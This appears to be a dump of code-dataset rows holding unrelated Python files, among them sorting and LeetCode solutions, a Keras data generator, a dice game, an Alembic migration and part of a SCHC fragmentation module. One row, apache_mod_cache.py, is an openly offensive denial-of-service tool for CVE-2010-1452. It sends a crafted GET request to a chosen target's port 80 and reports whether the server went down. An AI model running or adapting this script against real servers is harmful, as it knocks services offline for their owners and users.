max_stars_repo_path stringlengths 3 269 | max_stars_repo_name stringlengths 4 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.05M | score float64 0.23 5.13 | int_score int64 0 5 |
|---|---|---|---|---|---|---|
src/inversion/count_inversions.py | sahayabhishek/learning-algorithms | 0 | 12773151 | <filename>src/inversion/count_inversions.py
# Question
#
# The input file 'IntegerArray.txt' contains all of the 100,000 integers between 1 and 100,000 (inclusive) in some
# order, with no integer repeated.
#
# The task is to compute the number of inversions in the file given, where the i^{th} row of the file indicates
# the i^{th} entry of an array.
#
# load_arr reads data in a file and loads it into an array
def load_arr(file_name):
arr = []
with open(file_name) as fp:
lines = fp.readlines()
for line in lines:
arr.append(int(line.strip()))
return arr
# sort_and_count_split_inversions performs merge logic for the two sorted arrays and counts the inversions between
# those 2 arrays.
def sort_and_count_split_inversions(left_arr, right_arr):
left_arr_len = len(left_arr)
right_arr_len = len(right_arr)
sorted_arr = [None] * (left_arr_len + right_arr_len)
inv_count = 0
i = j = k = 0
while i < left_arr_len and j < right_arr_len:
if left_arr[i] <= right_arr[j]:
sorted_arr[k] = left_arr[i]
i += 1
else:
inv_count += (left_arr_len - i)
sorted_arr[k] = right_arr[j]
j += 1
k += 1
while i < left_arr_len:
sorted_arr[k] = left_arr[i]
i += 1
k += 1
while j < right_arr_len:
sorted_arr[k] = right_arr[j]
j += 1
k += 1
return inv_count, sorted_arr
# sort_and_count_inversions method counts the number of inversions in the array and also returns a sorted array.
# Array is sorted using merge sort algorithm. Time complexity of merge sort is O(n*log(n)).
def sort_and_count_inversions(arr):
length_arr = len(arr)
# Base case for recursion to exit
if length_arr == 1:
return 0, arr
else:
# Split the array in two and then recursively sort and count inversions in each half.
# Then count the split inversions (i.e. inversions between the two halves using the sorted array).
# Sum total of these 3 counts of inversion gives the number of inversions in the array.
middle_index = length_arr // 2
left_arr = arr[:middle_index]
right_arr = arr[middle_index:]
left_inv_count, left_arr_sorted = sort_and_count_inversions(left_arr)
right_inv_count, right_arr_sorted = sort_and_count_inversions(right_arr)
split_inv_count, arr_sorted = sort_and_count_split_inversions(left_arr_sorted, right_arr_sorted)
return left_inv_count + right_inv_count + split_inv_count, arr_sorted
if __name__ == '__main__':
arr = load_arr('IntegerArray.txt')
cnt, sorted_arr = sort_and_count_inversions(arr)
print cnt
| 4.15625 | 4 |
300-/659.py | yshshadow/Leetcode | 0 | 12773152 | # You are given an integer array sorted in ascending order (may contain duplicates), you need to split them into several subsequences, where each subsequences consist of at least 3 consecutive integers. Return whether you can make such a split.
#
# Example 1:
# Input: [1,2,3,3,4,5]
# Output: True
# Explanation:
# You can split them into two consecutive subsequences :
# 1, 2, 3
# 3, 4, 5
# Example 2:
# Input: [1,2,3,3,4,4,5,5]
# Output: True
# Explanation:
# You can split them into two consecutive subsequences :
# 1, 2, 3, 4, 5
# 3, 4, 5
# Example 3:
# Input: [1,2,3,4,4,5]
# Output: False
# Note:
# The length of the input is in range of [1, 10000]
import collections
class Solution(object):
def isPossible(self, nums):
"""
:type nums: List[int]
:rtype: bool
"""
count = collections.Counter(nums)
tails = collections.Counter()
for x in nums:
if count[x] == 0:
continue
elif tails[x] > 0:
tails[x] -= 1
tails[x + 1] += 1
elif count[x + 1] > 0 and count[x + 2] > 0:
count[x + 1] -= 1
count[x + 2] -= 1
tails[x + 3] += 1
else:
return False
count[x] -= 1
return True
s=Solution()
s.isPossible([1,2,3,3,4,4,5,5]) | 3.859375 | 4 |
conf/metadata.py | underworldcode/petsc4py | 3 | 12773153 | <filename>conf/metadata.py<gh_stars>1-10
classifiers = """
License :: OSI Approved :: BSD License
Operating System :: POSIX
Intended Audience :: Developers
Intended Audience :: Science/Research
Programming Language :: C
Programming Language :: C++
Programming Language :: Cython
Programming Language :: Python
Programming Language :: Python :: 2
Programming Language :: Python :: 3
Topic :: Scientific/Engineering
Topic :: Software Development :: Libraries :: Python Modules
"""
keywords = """
scientific computing
parallel computing
"""
metadata = {
'author' : '<NAME>',
'author_email' : '<EMAIL>',
'classifiers' : [c for c in classifiers.split('\n') if c],
'keywords' : [k for k in keywords.split('\n') if k],
'license' : 'BSD',
'platforms' : ['POSIX'],
'maintainer' : '<NAME>',
'maintainer_email' : '<EMAIL>',
}
| 1.703125 | 2 |
capsnets_laseg/io/transforms_gens.py | jchen42703/CapsNetsLASeg | 17 | 12773154 | <filename>capsnets_laseg/io/transforms_gens.py<gh_stars>10-100
import numpy as np
from keras_med_io.utils.custom_augmentations import get_positive_idx, get_random_slice_idx
from keras_med_io.utils.shape_io import reshape
from keras_med_io.base_generators.base_gens import BaseTransformGenerator
import nibabel as nib
import os
class Transformed2DGenerator(BaseTransformGenerator):
"""
Loads data, slices them based on the number of positive slice indices and applies data augmentation with `batchgenerators.transforms`.
* Supports channels_last
* .nii files should not have the batch_size dimension
Attributes:
list_IDs: list of filenames
data_dirs: list of paths to both the input dir and labels dir
batch_size: The number of images you want in a single batch
n_pos: The number of positive class 2D images to include in a batch
transform (Transform instance): If you want to use multiple Transforms, use the Compose Transform.
max_patient_shape (tuple): representing the maximum patient shape in a dataset; i.e. ((z,)x,y)
* Note: If you have 3D medical images and want 2D slices and don't want to overpad the slice dimension (z),
provide a shape that is only 2D (x,y).
step_per_epoch:
pos_mask: boolean representing whether or not output the positive masks (X*Y)
* If True, inputs are for capsule networks with a decoder.
* If False, inputs are for everything else.
shuffle: boolean
"""
def __init__(self, list_IDs, data_dirs, batch_size = 2, n_pos = 1,
transform = None, max_patient_shape = (256, 320), steps_per_epoch = 1536, pos_mask = True, shuffle = True):
BaseTransformGenerator.__init__(self, list_IDs = list_IDs, data_dirs = data_dirs, batch_size = batch_size,
n_channels = 1, n_classes = 1, ndim = 2,
transform = transform, max_patient_shape = max_patient_shape,
steps_per_epoch = steps_per_epoch, shuffle = shuffle)
self.n_pos = n_pos
self.pos_mask = pos_mask
if n_pos == 0:
print("WARNING! Your data is going to be randomly sliced.")
self.mode = "rand"
elif n_pos == batch_size:
print("WARNING! Your entire batch is going to be positively sampled.")
self.mode = "pos"
else:
self.mode = "bal"
if len(self.max_patient_shape) == 2:
self.dynamic_padding_z = True # no need to pad the slice dimension
def __getitem__(self, idx):
"""
Defines the fetching and on-the-fly preprocessing of data.
Args:
idx: the id assigned to each worker
Returns:
if self.pos_mask is True:
(X,Y): a batch of transformed data/labels based on the n_pos attribute.
elif self.pos_mask is False:
([X, Y], [Y, pos_mask]): multi-inputs for the capsule network decoder
"""
# file names
max_n_idx = (idx + 1) * self.batch_size
if max_n_idx > self.indexes.size:
print("Adjusting for idx: ", idx)
self.adjust_indexes(max_n_idx)
indexes = self.indexes[idx*self.batch_size:(idx+1)*self.batch_size]
# Fetches batched IDs for a thread
list_IDs_temp = [self.list_IDs[k] for k in indexes]
# balanced sampling
if self.mode == "bal":
# generating data for both positive and randomly sampled data
X_pos, Y_pos = self.data_gen(list_IDs_temp[:self.n_pos], pos_sample = True)
X_rand, Y_rand = self.data_gen(list_IDs_temp[self.n_pos:], pos_sample = False)
# concatenating all the corresponding data
X, Y = np.concatenate([X_pos, X_rand], axis = 0), np.concatenate([Y_pos, Y_rand], axis = 0)
# shuffling the order of the positive/random patches
out_rand_indices = np.arange(0, X.shape[0])
np.random.shuffle(out_rand_indices)
X, Y = X[out_rand_indices], Y[out_rand_indices]
# random sampling
elif self.mode == "rand":
X, Y = self.data_gen(list_IDs_temp, pos_sample = False)
elif self.mode == "pos":
X, Y = self.data_gen(list_IDs_temp, pos_sample = True)
# data augmentation
if self.transform is not None:
X, Y = self.apply_transform(X, Y)
# print("Getting item of size: ", indexes.size, "out of ", self.indexes.size, "with idx: ", idx, "\nX shape: ", X.shape)
assert X.shape[0] == self.batch_size, "The outputted batch doesn't match the batch size."
if self.pos_mask:
pos_mask = X * Y
return ([X, Y], [Y, pos_mask])
elif not self.pos_mask:
return (X, Y)
def data_gen(self, list_IDs_temp, pos_sample):
"""
Generates a batch of data.
Args:
list_IDs_temp: batched list IDs; usually done by __getitem__
pos_sample: boolean on if you want to sample a positive image or not
Returns:
tuple of two numpy arrays: x, y
"""
images_x = []
images_y = []
for id in list_IDs_temp:
# loads data as a numpy arr and then changes the type to float32
x_train = np.expand_dims(np.load(os.path.join(self.data_dirs[0], id)), -1)
y_train = np.expand_dims(np.load(os.path.join(self.data_dirs[1], id)), -1)
# Padding to the max patient shape (so the arrays can be stacked)
if self.dynamic_padding_z: # for when you don't want to pad the slice dimension (bc that usually changes in images)
pad_shape = (x_train.shape[0], ) + self.max_patient_shape
elif not self.dynamic_padding_z:
pad_shape = self.max_patient_shape
x_train = reshape(x_train, x_train.min(), pad_shape + (self.n_channels, ))
y_train = reshape(y_train, 0, pad_shape + (self.n_classes, ))
# extracting slice:
if pos_sample:
slice_idx = get_positive_idx(y_train)[0]
elif not pos_sample:
slice_idx = get_random_slice_idx(x_train)
images_x.append(x_train[slice_idx]), images_y.append(y_train[slice_idx])
input_data, seg_masks = np.stack(images_x), np.stack(images_y)
return (input_data, seg_masks)
| 2.625 | 3 |
website.py | GVineeta/movie-trailer-website_2 | 0 | 12773155 | # website.py
# Created by: <NAME>
# Date: 5 June 2015
# Purpouse: This file is for instantiating all the movie objects and then
# call display_page.py to render the movies in an html page
import display_page
import movie
# Creating objects for my favourite movie
cars = movie.Movie(
"Cars",
"Story about live cars",
"2006",
"Pixar Animation Studios",
"Walt Disney Pictures",
"<NAME>",
"Golden Globe Award for Best Animated Feature Film",
"https://upload.wikimedia.org/wikipedia/en/3/34/Cars_2006.jpg",
"https://www.youtube.com/watch?v=WGByijP0Leo"
)
ratatouille = movie.Movie(
"Ratatouille",
"Anybody can cook",
"2007",
"Pixar Animation Studios",
"Walt Disney Pictures",
"<NAME>",
"Academy Award for Best Animated Feature",
"https://upload.wikimedia.org/wikipedia/en/5/50/RatatouillePoster.jpg",
"https://www.youtube.com/watch?v=c3sBBRxDAqk"
)
tangled = movie.Movie(
"Tangled",
"Girl with long golden red hairs",
"2010",
"Walt Disney Animation Studios",
"Walt Disney Pictures",
"<NAME> & <NAME>",
"Best Original Song at the 83rd Academy Awards",
"https://upload.wikimedia.org/wikipedia/en/a/a8/Tangled_poster.jpg",
"https://www.youtube.com/watch?v=pyOyBVXDJ9Q"
)
brave = movie.Movie(
"Brave",
"Girl with lot of courage",
"2012",
"Pixar Animation Studios",
"Walt Disney Pictures",
"Mark Andrews and <NAME>",
"Academy Award,the Golden Globe,and the BAFTA Award for Best \
Animated Feature Film.",
"https://upload.wikimedia.org/wikipedia/en/9/96/Brave_Poster.jpg",
"https://www.youtube.com/watch?v=6CKcqIahedc"
)
# Create an arrary of all my favourite movies
movies_list = [cars, ratatouille, tangled, brave]
# Call another python script to render the movies on an html page
display_page.open_movies_page(movies_list)
# EOF
| 2.921875 | 3 |
Code/game_projects/Roll-a-dice/dice.py | Kevinjadia/Hacktoberfest_DSA_2021 | 4 | 12773156 | <gh_stars>1-10
import random
from math import ceil, sqrt
import colored
from colored import stylize
_MAG_BOLD = colored.fg("magenta") + colored.attr("bold")
_YELLOW_BOLD = colored.fg("yellow_4b") + colored.attr("bold")
_GREEN_BOLD = colored.fg("green") + colored.attr("bold")
class Die:
def __init__(self, faces_count, eyes="o ", corner="+"):
"""Compute statistics about places of eyes on a die face"""
if len(eyes) != 2:
raise ValueError("Excpected two choices for eyes parameter")
self.eyes = eyes
width = int(sqrt(faces_count))
height = ceil(faces_count / width)
# Fix lengthes for nearly square ascii-art
while height > width + 1:
width += 1
height = ceil(faces_count / width)
# Account for python 2 ceil returning float
height = int(height)
if not height % 2:
# Fix height to have a middle point
height += 1
# Values to generate a specific face
self.limit = width * height
self.faces = faces_count
# Template of the face
pattern = " ".join("{}" for _ in range(width))
pattern = "| {} |".format(pattern)
top = corner + ("-" * (2 * width + 1)) + corner
middle = " ".join("{}" for _ in range(width // 2))
middle = "| " + middle + " " * (width % 2)
self.pattern = "\n".join(
[top] + [pattern for _ in range(height // 2)] + [middle]
)
# Size of the ascii-art
self.width = len(top)
self.height = self.pattern.count("\n") * 2 + 1
def face(self, roll):
"""Return the full face of the roll for this die.
roll is accounted in a 0-base fashion.
"""
if not (0 <= roll < self.faces):
raise ValueError("Roll is higher than die size or negative")
eye_full, eye_empty = self.eyes
# Fill the pattern with correct eye for current roll
upper_face = self.pattern.format(
*(eye_empty if roll < i else eye_full for i in range(1, self.limit, 2))
)
# Return mirrored pattern string with changing middle to get a full face
return upper_face + self.eyes[roll & 1] + upper_face[::-1]
def print_dice_rolls(faces_count, rolls, zero_based=False, max_width=72, eyes="o "):
"""Pretty print all rolls using faces_count-sided di(c)e."""
# Set up some default values
die = Die(faces_count, eyes)
face_width = die.width
# Will try to collate output of multiple dice rolls into lines
# of up to max_width length
output_buffer = ["" for _ in range(die.height)]
# Output the dice rolls using output_buffer
# Make sure to use 0-based rolls
for roll in (r + zero_based - 1 for r in rolls):
# Flush buffer if too wide
if len(output_buffer[0]) + face_width >= max_width:
for idx, line in enumerate(output_buffer):
pp(line, _YELLOW_BOLD)
output_buffer[idx] = ""
# Build a proper face according to faces_count and roll
current_face = die.face(roll)
# Append die to output_buffer
for idx, line in enumerate(current_face.split("\n")):
output_buffer[idx] += line + " "
# Print remaining dice in output_buffer
if output_buffer[0]:
for line in output_buffer:
pp(line, _YELLOW_BOLD)
def pp(text, style=_MAG_BOLD):
""" Pretty-print with style """
print(stylize(text, style))
def Rolldice(rolls):
rolles = [random.randint(1, 6) for x in range(0, rolls)]
print("\n\n")
print_dice_rolls(6, rolles)
print("\n\n")
main()
def main():
pp("1. Roll a dice") # roll for one dice
pp("2. Roll multiple dice") # roll for multiple dice
pp("3. Exit from Game\n\n") # exit() function to exit from game.
choice = int(input(stylize("Enter choice: ", _GREEN_BOLD)))
if choice == 1:
Rolldice(1)
if choice == 2:
rolls = int(input(stylize("Enter no. of rolls: ", _GREEN_BOLD)))
Rolldice(rolls) # call for multiple rolls
if choice == 3:
print("Out of the Game")
exit()
if __name__ == "__main__":
pp("\n\n---====Roll A Dice!====---\n\n", _GREEN_BOLD)
main()
| 2.96875 | 3 |
tools/apache_mod_cache.py | crempp/bin | 0 | 12773157 | #!/usr/bin/python
import socket, getopt, sys
try:
opts, args = getopt.getopt(sys.argv[1:], "ht:")
except getopt.GetoptError, err:
print str(err)
exit()
def banner():
print "************************************************"
print "**|''''''''''''''''''''''''''''''''''''''''''|**"
print "**|Apache DoS tool |**"
print "**|By: <NAME> |**"
print "**|Email: anarchy.ang31 [@] gmail |**"
print "**|http://hha.zapto.org |**"
print "**|- |**"
print "**|Usage: |**"
print "**| $ python apacheDoS-CVE20101452.py -h |**"
print "**| |**"
print "**|,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,|**"
print "************************************************"
print ""
for o, a in opts:
if o in ("-h", "--help"):
banner()
print "-h: This message."
print "-t <target>: The target server you want to DoS"
print "i.e. user@user:~/$ python apacheDoS-CVE20101452.py -t www.target.com"
print "This script uses the CVE-2010-1452 bug to DoS apache servers."
print "More info: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1452"
exit()
elif o in ("-t", "--target"):
server = a
else:
assert False, "unhandled option"
try:
server
except NameError:
print "No mode set."
print "Try -h"
exit()
banner()
print "Starting DoS attack"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#now connect to the web server on port 80
# - the normal http port
s.connect((server, 80))
s.send("GET http://"+server+" HTTP/1.0")
print "Packets sent\nChecking servers status....."
s.close()
f = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
f.connect((server, 80))
print "Server not open to DoS :("
f.close()
except:
print "DoS done xD"
| 2.53125 | 3 |
tests/test_modify.py | ganesh-k13/titanium-rhythm | 0 | 12773158 | <filename>tests/test_modify.py
import pytest
import string
import random
import os
import pkg_resources
from titanium_rhythm.modify import Song
SONG_FOLDER_PATH = pkg_resources.resource_filename('titanium_rhythm', 'songs/')
def test_modify():
rand_string = ''.join(random.choice(string.ascii_uppercase) for _ in range(10))
# dirpath, dirs, files = next(os.walk(SONG_FOLDER_PATH))
song_file = os.path.join(SONG_FOLDER_PATH, '23.mp3')
s = Song(song_file)
# s.modify(title = rand_string, artist = rand_string, album = rand_string, genre = 'rock', lyrics = rand_string, image_path = os.path.join(SONG_FOLDER_PATH, 'images.png'))
s.modify_title(title = rand_string)
s.modify_artist(artist = rand_string)
s.modify_album(album = rand_string)
s.modify_genre(genre = 'rock')
s.modify_lyrics(lyrics = rand_string)
s.modify_image_path(image_path = 'https://en.wikipedia.org/wiki/Counting_Stars#/media/File:OneRepublic_Counting_Stars_cover.png')
del(s)
new_s = Song(song_file)
tag_info = new_s.get_tag()
assert(tag_info['title'] == rand_string)
assert(tag_info['artist'] == rand_string)
assert(tag_info['album'] == rand_string)
assert(tag_info['genre'].name == 'Rock')
assert(tag_info['lyrics'] == rand_string)
| 2.453125 | 2 |
pkgs/sdk-pkg/src/genie/libs/sdk/triggers/template/devicenotfound.py | jbronikowski/genielibs | 94 | 12773159 | <filename>pkgs/sdk-pkg/src/genie/libs/sdk/triggers/template/devicenotfound.py
''' triggerNoDevice template '''
# import ats
from ats import aetest
# import genie infra
from genie.harness.base import Trigger
@aetest.skip(reason='The device provided does not exist in the testbed yaml')
class TriggerDeviceNotFound(Trigger):
''' Trigger that is used when a device is not found '''
pass
| 1.742188 | 2 |
migrations/versions/12b0e8390634_add_tutor_and_moderator.py | iKintosh/Tink2020_LMS | 1 | 12773160 | """add Tutor and Moderator
Revision ID: 12b0e8390634
Revises: <PASSWORD>
Create Date: 2020-01-12 12:41:22.787337
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '12b0e8390634'
down_revision = '<PASSWORD>'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('moderator',
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('course_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['course_id'], ['course.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
sa.PrimaryKeyConstraint('user_id', 'course_id')
)
op.create_table('tutor',
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('course_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['course_id'], ['course.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
sa.PrimaryKeyConstraint('user_id', 'course_id')
)
op.add_column('answer', sa.Column('homework_id', sa.Integer(), nullable=True))
op.add_column('answer', sa.Column('user_id', sa.Integer(), nullable=True))
op.create_foreign_key(None, 'answer', 'user', ['user_id'], ['id'])
op.create_foreign_key(None, 'answer', 'homework', ['homework_id'], ['id'])
op.add_column('student', sa.Column('entry_year', sa.Integer(), nullable=True))
op.add_column('student', sa.Column('user_id', sa.Integer(), nullable=False))
op.drop_constraint('student_id_fkey', 'student', type_='foreignkey')
op.create_foreign_key(None, 'student', 'user', ['user_id'], ['id'])
op.drop_column('student', 'id')
op.add_column('user', sa.Column('about_me', sa.String(), nullable=True))
op.add_column('user', sa.Column('city', sa.String(), nullable=True))
op.add_column('user', sa.Column('facebook_link', sa.String(), nullable=True))
op.add_column('user', sa.Column('instagram_link', sa.String(), nullable=True))
op.add_column('user', sa.Column('is_moderator', sa.Boolean(), nullable=True))
op.add_column('user', sa.Column('is_tutor', sa.Boolean(), nullable=True))
op.add_column('user', sa.Column('linkedin_link', sa.String(), nullable=True))
op.add_column('user', sa.Column('middle_name', sa.String(), nullable=True))
op.add_column('user', sa.Column('password_hash', sa.String(), nullable=True))
op.add_column('user', sa.Column('vk_link', sa.String(), nullable=True))
op.drop_column('user', 'status')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('user', sa.Column('status', sa.VARCHAR(), autoincrement=False, nullable=True))
op.drop_column('user', 'vk_link')
op.drop_column('user', 'password_hash')
op.drop_column('user', 'middle_name')
op.drop_column('user', 'linkedin_link')
op.drop_column('user', 'is_tutor')
op.drop_column('user', 'is_moderator')
op.drop_column('user', 'instagram_link')
op.drop_column('user', 'facebook_link')
op.drop_column('user', 'city')
op.drop_column('user', 'about_me')
op.add_column('student', sa.Column('id', sa.INTEGER(), autoincrement=False, nullable=False))
op.drop_constraint(None, 'student', type_='foreignkey')
op.create_foreign_key('student_id_fkey', 'student', 'user', ['id'], ['id'])
op.drop_column('student', 'user_id')
op.drop_column('student', 'entry_year')
op.drop_constraint(None, 'answer', type_='foreignkey')
op.drop_constraint(None, 'answer', type_='foreignkey')
op.drop_column('answer', 'user_id')
op.drop_column('answer', 'homework_id')
op.drop_table('tutor')
op.drop_table('moderator')
# ### end Alembic commands ###
| 1.914063 | 2 |
xsdata/formats/dataclass/models/generics.py | pashashocky/xsdata | 0 | 12773161 | <gh_stars>0
from dataclasses import dataclass
from dataclasses import field
from typing import Dict
from typing import Generic
from typing import List
from typing import Optional
from typing import TypeVar
from xsdata.formats.dataclass.models.elements import XmlType
T = TypeVar("T", bound=object)
@dataclass
class AnyElement:
"""
Generic model to bind xml document data to wildcard fields.
:param qname: The element's qualified name
:param text: The element's text content
:param tail: The element's tail content
:param children: The element's list of child elements.
:param attributes: The element's key-value attribute mappings.
"""
qname: Optional[str] = field(default=None)
text: Optional[str] = field(default=None)
tail: Optional[str] = field(default=None)
children: List[object] = field(
default_factory=list, metadata={"type": XmlType.WILDCARD}
)
attributes: Dict[str, str] = field(
default_factory=dict, metadata={"type": XmlType.ATTRIBUTES}
)
@dataclass
class DerivedElement(Generic[T]):
"""
Generic model wrapper for type substituted elements.
Example: eg. <b xsi:type="a">...</b>
:param qname: The element's qualified name
:param value: The wrapped value
:param type: The real xsi:type
"""
qname: str
value: T
type: Optional[str] = None
| 2.546875 | 3 |
test_frame/best_simple_example/test_publish.py | aopusd/distributed_framework | 2 | 12773162 | # -*- coding: utf-8 -*-
# @Author : ydf
# @Time : 2019/8/8 0008 14:57
import time
from test_frame.best_simple_example.test_consume import consumer
consumer.publisher_of_same_queue.clear()
# 这里的publisher_of_same_queue 也可以使用get_publisher函数得到发布者,但需要手动确保消费者的队列名字与发布者的队列名字一致,并且中间件种类一致。用法如下。
# pb = get_publisher('queue_test2',broker_kind=6)
# pb.publish({'a': i, 'b': 2 * i})
# [consumer.publisher_of_same_queue.publish({'a': i, 'b': 2 * i}) for i in range(100)]
for i in range(10000):
time.sleep(0.05)
consumer.publisher_of_same_queue.publish({'a': i, 'b': 2 * i}) | 2.5 | 2 |
challenges/2020/13-shuttleSearch/python/partTwo.py | codemicro/adventOfCode | 9 | 12773163 | def partTwo(instr: str) -> int:
# This is the parsing section
service_list = instr.strip().split("\n")[-1].split(",")
eqns = []
for i, svc in enumerate(service_list):
if svc == "x":
continue
svc = int(svc)
v = 0
if i != 0:
v = svc - i # This is the only maths stuff in the parsing
eqns.append((v, svc))
# This is the maths section
n = 1
for (_, v) in eqns:
n *= v
sigma_x = 0
for (bi, ni) in eqns:
# this type cast could potentially cause a problem.
# int required for pow function and the division *should* produce a whole number anyway
Ni = int(n / ni)
yi = pow(Ni, -1, ni) # https://stackoverflow.com/a/9758173
sigma_x += bi * Ni * yi
return sigma_x % n
| 3.390625 | 3 |
src/old/fraglogic.py | saguilarDevel/open_schc | 1 | 12773164 | #---------------------------------------------------------------------------
import warnings
import struct
import sys
sys.path.append("../../PLIDO-tanupoo")
import fragment
#import schc_fragment as fragment
sys.path.append("../python")
import BitBuffer as BitBufferModule
#---------------------------------------------------------------------------
class BitBuffer_XXX(BitBufferModule.BitBuffer):
#XXX debug and put in BitBuffer.py
def __init__(self, *args, **kwargs):
BitBufferModule.BitBuffer.__init__(self, *args, **kwargs)
def add_bits(self, bits_as_long_int, nb_bits):
for i in range(nb_bits, -1, -1):
self.add_bit(bits_as_long_int & (1 << i))
pop_bit = BitBufferModule.BitBuffer.next_bit
def pop_bits(self, nb_bits):
result = 0
for i in range(nb_bits, -1, -1):
if self.pop_bit():
result |= (1<<i)
def pop_byte(self):
return self.pop_bits(8)
def pop_bytes(self, nb_bytes):
return bytearray([self.pop_byte() for i in range(nb_bytes)])
def get_content(self):
return self._buf[:]
class FakeBitBuffer:
def __init__(self, content = []):
self.content = content[:]
def add_bits(self, bits_as_long, nb_bits):
self.content.append((bits_as_long, nb_bits))
def get_bits(self, nb_bits):
bits_as_long, added_nb_bits = self.content.pop(0)
assert nb_bits == added_nb_bits
return bits_as_long
def get_content(self):
return self.content[:]
def test_BitBuffer():
bitbuffer = FakeBitBuffer()
bitbuffer.add_bits(0xf, 4)
bitbuffer.add_bits(0, 2)
bitbuffer.add_bits(0x1, 2)
for i in range(3):
bitbuffer.add_bits(0, 1)
bitbuffer.add_bits(0x1, 1)
bitbuffer.add_bits(0x3, 2)
print(bitbuffer.get_content())
#print([bin(x) for x in bitbuffer.get_content])
#test_BitBuffer(); exit_now()
#---------------------------------------------------------------------------
RELIABILITY_OPTION_LIST = ["no-ack", "window", "ack-on-error"]
class SchcFragmentFormat:
def __init__(self, R, T, N, M, mode="window"):
if mode not in RELIABILITY_OPTION_LIST:
raise ValueError("unknown reliability option", mode)
self.R = R
self.T = T
self.N = N
self.M = M
self.mode = mode
if self.mode == "no-ack":
self.window_field_bitsize = 0
else: self.window_field_bitsize = 1
# 880 fragments format this field has a size of R - T - N - 1 bits when
# 881 Window mode is used. In No ACK mode, the Rule ID field has a size of
# 882 R - T - N bits see format section.
self.rule_id_bitsize = (self.R - self.T - self.N
- self.window_field_bitsize)
assert self.rule_id_bitsize >= 0
assert self.N >= 1
assert self.mode == "window" # XXX in this version of the code
def get_all_0(self):
return 0
def get_all_1(self):
return 2**self.N - 1
def get_fcn_max(self):
"""maximum value of the FCN, itself included"""
self.fcn_max = 2**self.N - 2
def pack_fragment(self, rule_id, dtag, window_index, advertized_fcn,
payload, mic = b""):
# 1013 <------------ R ---------->
# 1014 <--T--> 1 <--N-->
# 1015 +-- ... --+- ... -+-+- ... -+---...---+
# 1016 | Rule ID | DTag |W| FCN | payload |
# 1017 +-- ... --+- ... -+-+- ... -+---...---+
#
# and
#
# 1105 <------------ R ------------>
# 1106 <- T -> 1 <- N -> <---- M ----->
# 1107 +-- ... --+- ... -+-+- ... -+---- ... ----+---...---+
# 1108 | Rule ID | DTag |W| 11..1 | MIC | payload |
# 1109 +-- ... --+- ... -+-+- ... -+---- ... ----+---...---+
bit_buffer = FakeBitBuffer()
bit_buffer.add_bits(rule_id, self.rule_id_bitsize)
bit_buffer.add_bits(dtag, self.T)
bit_buffer.add_bits(window_index%2, 1)
bit_buffer.add_bits(advertized_fcn, self.N)
assert ( (len(mic) == 0 and advertized_fcn != self.get_all_1())
or (len(mic) != 0 and advertized_fcn == self.get_all_1()))
if len(mic) > 0:
bit_buffer.add_bits(mic, self.M)
bit_buffer.add_bits(payload, 8*len(payload))
return bit_buffer.get_content()
def pack_empty_fragment(self, advertized_fcn):
# 1083 <------------ R ------------>
# 1084 <- T -> 1 <- N ->
# 1085 +-- ... --+- ... -+-+- ... -+
# 1086 | Rule ID | DTag |W| 0..0 | TODO
# 1087 +-- ... --+- ... -+-+- ... -+
# 1088
# 1089 Figure 13: All-0 empty format fragment
# XXX
raise RuntimeError("Not implemented yet: XXX")
def unpack_fragment_or_ack(self):
pass
def pack_ack(self, XXX):
pass
#---------------------------------------------------------------------------
INTER_FRAGMENT_DELAY = 1.0 # seconds
WAIT_BITMAP_TIMEOUT = 5.0 # seconds
class WindowAckModeSender:
"""The fragmentation manager handles the logic of the fragment sending etc.
"""
def __init__(self, system_manager, fragment_format_XXX_unused, full_packet,
rule_id, dtag, window_max_size, fragment_size):
self.rule_id = rule_id
self.dtag = dtag
R = 16 # header size
T = 4 # DTag size
N = 4 # FCN size
M = 8 # MIC size
BITMAP_SIZE = 8 # bits
self.system_manager = system_manager
# XXX: use soichi code again:
#fragment.fp = fragment_format #XXX: hack
#self.fragment = fragment.fragment(
# srcbuf=full_packet, rule_id=rule_id, dtag=dtag,
# noack=False, window_size=window_size)
##self.fragment = fragment.fragment(
## srcbuf=full_packet, dtag=dtag, rid=rule_id)
#print(self.fragment.__dict__) #XXX
self.fragment_size = fragment_size
self.nb_fragment = (len(full_packet) + fragment_size-1) // fragment_size
# 1376 Intially, when a fragmented packet need to be sent, the window is set
# 1377 to 0, a local_bit map is set to 0, and FCN is set the the highe
# 1378 possible value depending on the number of fragment that will be sent
# 1379 in the window (INIT STATE).
self.state = "INIT"
self.window_index = 0
# (some of these variables are duplicates of the class fragment.fragment)
self.full_packet = full_packet
self.full_packet_position = 0
self.window_index = 0
self.window_max_size = window_max_size
self.R = R
self.T = T
self.N = N
self.M = M
self.format_mgr = SchcFragmentFormat(R=R, T=T, N=N, M=M, mode="window")
print("STATE INIT, fragmentation parameters:")
print(" nb_fragment={}".format(self.nb_fragment))
print(" fragment_size={}".format(fragment_size))
print(" R(header size)={}".format(self.R))
print(" T(DTag size)={}".format(self.T))
print(" N(FCN size)={}".format(self.N))
self.init_current_window()
def init_current_window(self):
# pre-compute the fragments to send in the window, and init variables.
# (the fragment_size is allowed to be changed between windows)
assert self.full_packet_position < len(self.full_packet)
remaining_nb_byte = len(self.full_packet) - self.full_packet_position
remaining_nb_fragment = (
(remaining_nb_byte + self.fragment_size-1) // self.fragment_size )
assert remaining_nb_fragment > 0
self.is_last_window = (remaining_nb_fragment < self.window_max_size)
if not self.is_last_window:
self.window_size = self.window_max_size
else: self.window_size = remaining_nb_fragment
p, fs = self.full_packet_position, self.fragment_size
self.fragment_list = [ self.full_packet[p+i*fs:p+(i+1)*(fs)]
for i in range(self.window_size)]
self.window_fragment_index = 0
print("window #{} last={} nb_frag={}\n frag={}".format(
